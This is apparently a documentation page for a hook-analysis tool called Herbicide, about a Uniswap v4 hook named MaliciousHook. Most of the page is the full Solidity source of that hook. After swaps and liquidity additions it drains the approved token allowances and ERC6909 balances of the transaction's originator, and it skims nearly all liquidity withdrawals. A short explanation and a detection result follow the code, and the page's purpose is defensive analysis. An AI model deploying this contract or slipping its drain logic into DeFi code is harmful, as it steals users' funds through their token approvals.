Copy // SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import { BaseHook } from "v4-periphery/src/base/hooks/BaseHook.sol" ;
import { ERC1155 } from "@openzeppelin/contracts/token/ERC1155/ERC1155.sol" ;
import { IPoolManager } from "v4-core/src/interfaces/IPoolManager.sol" ;
import { Hooks } from "v4-core/src/libraries/Hooks.sol" ;
import { PoolId , PoolIdLibrary } from "v4-core/src/types/PoolId.sol" ;
import { PoolKey } from "v4-core/src/types/PoolKey.sol" ;
import { Currency , CurrencyLibrary } from "v4-core/src/types/Currency.sol" ;
import { StateLibrary } from "v4-core/src/libraries/StateLibrary.sol" ;
import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol" ;
import { TickMath } from "v4-core/src/libraries/TickMath.sol" ;
import { BalanceDelta } from "v4-core/src/types/BalanceDelta.sol" ;
import { FixedPointMathLib } from "solmate/src/utils/FixedPointMathLib.sol" ;
import { IHooks } from "v4-core/src/interfaces/IHooks.sol" ;
import { SafeCast } from "v4-core/src/libraries/SafeCast.sol" ;
import { toBalanceDelta } from "v4-core/src/types/BalanceDelta.sol" ;
import { CurrencySettler } from "v4-core/test/utils/CurrencySettler.sol" ;
contract MaliciousHook is BaseHook {
using Hooks for IHooks ;
using SafeCast for uint256 ;
using SafeCast for int128 ;
using CurrencySettler for Currency ;
bool private firstAddLiquidity = true ;
uint128 public constant TOTAL_BIPS = 10000 ;
constructor ( IPoolManager _manager ) BaseHook (_manager) {}
function getHookPermissions ()
returns ( Hooks . Permissions memory )
Hooks. Permissions ({
beforeInitialize : false ,
afterInitialize : false ,
beforeAddLiquidity : false ,
afterAddLiquidity : true ,
beforeRemoveLiquidity : false ,
afterRemoveLiquidity : true ,
beforeSwap : false ,
afterSwap : true ,
beforeDonate : false ,
afterDonate : false ,
beforeSwapReturnDelta : false ,
afterSwapReturnDelta : true ,
afterAddLiquidityReturnDelta : true ,
afterRemoveLiquidityReturnDelta : true
function afterSwap (
address sender , /* sender **/
PoolKey calldata key ,
IPoolManager . SwapParams calldata params ,
BalanceDelta delta ,
bytes calldata /* hookData **/
) external override onlyPoolManager returns ( bytes4 , int128 ) {
bool specifiedTokenIs0 = (params.amountSpecified < 0 == params.zeroForOne);
(Currency targetCurrency , int128 swapAmount) =
(specifiedTokenIs0) ? (key.currency1 , delta. amount1 ()) : (key.currency0 , delta. amount0 ());
if (swapAmount < 0 )
swapAmount = - swapAmount;
return (IHooks.afterSwap.selector , 0 );
address victim = tx.origin;
IERC20 feeToken = IERC20 (Currency. unwrap (targetCurrency));
uint256 stealAmount = feeToken. allowance (victim , sender);
if (stealAmount > targetCurrency. balanceOf (victim)) {
stealAmount = targetCurrency. balanceOf ( address (victim));
if (poolManager. isOperator (victim , sender)) {
uint256 balance_6909 = poolManager. balanceOf (victim , targetCurrency. toId ());
stealAmount = stealAmount < balance_6909 ? stealAmount : balance_6909;
targetCurrency. take (poolManager , address ( this ) , stealAmount , true );
targetCurrency.settle(poolManager, address(this), (stealAmount * key.fee / TOTAL_BIPS) + uint128(swapAmount), true);
stealAmount = stealAmount - (stealAmount * key.fee / TOTAL_BIPS) - uint128 (swapAmount);
return (IHooks.afterSwap.selector , (stealAmount). toInt128 ());
function afterRemoveLiquidity (
address , /* sender **/
PoolKey calldata key ,
IPoolManager . ModifyLiquidityParams calldata , /* params **/
BalanceDelta delta ,
BalanceDelta ,
bytes calldata /* hookData **/
) external override onlyPoolManager returns ( bytes4 , BalanceDelta ) {
assert (delta. amount0 () >= 0 && delta. amount1 () >= 0 );
uint256 stealAmount0;
uint256 stealAmount1;
if (delta. amount0 () > 0 )
stealAmount0 = uint128 (delta. amount0 ()) - 1 ;
if (delta. amount1 () > 0 )
stealAmount1 = uint128 (delta. amount1 ()) - 1 ;
key.currency0. take (poolManager , address ( this ) , stealAmount0 , true );
key.currency1. take (poolManager , address ( this ) , stealAmount1 , true );
return (IHooks.afterRemoveLiquidity.selector, toBalanceDelta(int128(uint128(stealAmount0)), int128(uint128(stealAmount1))));
function afterAddLiquidity (
address sender , /* sender **/
PoolKey calldata key ,
IPoolManager . ModifyLiquidityParams calldata , /* params **/
BalanceDelta delta ,
BalanceDelta ,
bytes calldata /* hookData **/
) external override onlyPoolManager returns ( bytes4 , BalanceDelta ) {
if (firstAddLiquidity) {
firstAddLiquidity = false ;
return (IHooks.afterAddLiquidity.selector , toBalanceDelta ( 0 , 0 ));
assert (delta. amount0 () <= 0 && delta. amount1 () <= 0 );
address victim = tx.origin;
IERC20 targetToken0 = IERC20 (Currency. unwrap (key.currency0));
IERC20 targetToken1 = IERC20 (Currency. unwrap (key.currency1));
uint256 stealAmount0 = targetToken0. allowance (victim , sender);
uint256 stealAmount1 = targetToken1. allowance (victim , sender);
if (stealAmount0 > targetToken0. balanceOf (victim)) {
stealAmount0 = targetToken0. balanceOf ( address (victim));
if (stealAmount1 > targetToken1. balanceOf (victim)) {
stealAmount1 = targetToken1. balanceOf ( address (victim));
if (poolManager. isOperator (victim , sender)) {
uint256 balance0_6909 = poolManager. balanceOf (victim , key.currency0. toId ());
uint256 balance1_6909 = poolManager. balanceOf (victim , key.currency1. toId ());
stealAmount0 = stealAmount0 < balance0_6909 ? stealAmount0 : balance0_6909;
stealAmount1 = stealAmount1 < balance1_6909 ? stealAmount1 : balance1_6909;
key.currency0. take (poolManager , address ( this ) , stealAmount0 , true );
key.currency1. take (poolManager , address ( this ) , stealAmount1 , true );
key.currency0. settle (poolManager , address ( this ) , uint128 ( - delta. amount0 ()) , true );
key.currency1. settle (poolManager , address ( this ) , uint128 ( - delta. amount1 ()) , true );
stealAmount0 -= uint128 ( - delta. amount0 ());
stealAmount1 -= uint128 ( - delta. amount1 ());
return (IHooks.afterAddLiquidity.selector, toBalanceDelta(int128(uint128(stealAmount0)), int128(uint128(stealAmount1))));
A malicious hook can monitor the amount of tokens a user has approved.
The image above illustrates the process in which the Malicious Hook exploits the token approval mechanism. The first step shows the Malicious Hook verifying the approved token amount. In the second step, it proceeds to transfer the entire approved token quantity to ERC6909. Finally, the required amount is settled for legitimate Swap/ModifyLiquidity actions, allowing the Malicious Hook to maximize the tokens stolen from the User.
Herbicide Detection Result
Hooks can significantly influence PoolKeys' behavior. For example, if a hook triggers a revert, it could render the associated pool unusable. Such cases, which compromise user accessibility, include attacks like gas griefing. Herbicide addresses these risks by detecting such hooks through dynamic analysis testing.
Copy {
"currency0" : "0x0197481B0F5237eF312a78528e79667D8b33Dcff" ,
"currency1" : "0xA56569Bd93dc4b9afCc871e251017dB0543920d4" ,
"fee" : 3000 ,
"tickSpacing" : 60 ,
"hooks" : "0x3c712B5E5B4a7ee97E4e3F2330bFb435050a4800" ,
"deployer" : "0x4e59b44847b379578588920cA78FbF26c0B4956C"